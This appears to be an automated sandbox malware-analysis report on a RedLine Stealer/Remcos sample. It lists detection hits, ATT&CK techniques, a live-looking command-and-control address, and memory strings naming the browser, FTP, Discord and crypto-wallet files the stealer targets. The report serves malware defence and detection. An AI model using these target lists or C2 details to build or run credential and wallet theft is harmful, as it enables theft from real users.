Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7732, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7732, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7732, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 OS Credential Dumping	331 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	32 Software Packing	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nzLoHpgAln.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
nzLoHpgAln.exe	57%	Virustotal		Browse
nzLoHpgAln.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos

Source	Detection	Scanner	Label
http://185.222.57.76:55615/	0%	Avira URL Cloud	safe
http://185.222.57.76:55615t-	0%	Avira URL Cloud	safe
185.222.57.76:55615	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
http://185.222.57.76:55615	0%	Avira URL Cloud	safe
http://185.222.57.76:5	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.222.57.76:55615/	true	Avira URL Cloud: safe	unknown
185.222.57.76:55615	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://www.fontbureau.com/designersG	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://www.fontbureau.com/designers/?	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.00000000032D0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://www.fontbureau.com/designers	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	false		high
http://www.galapagosdesign.com/DPlease	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	nzLoHpgAln.exe, 00000000.00000002.1751633310.0000000002732000.00000004.00000800.00020000.00000000.sdmp, nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1849378613.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
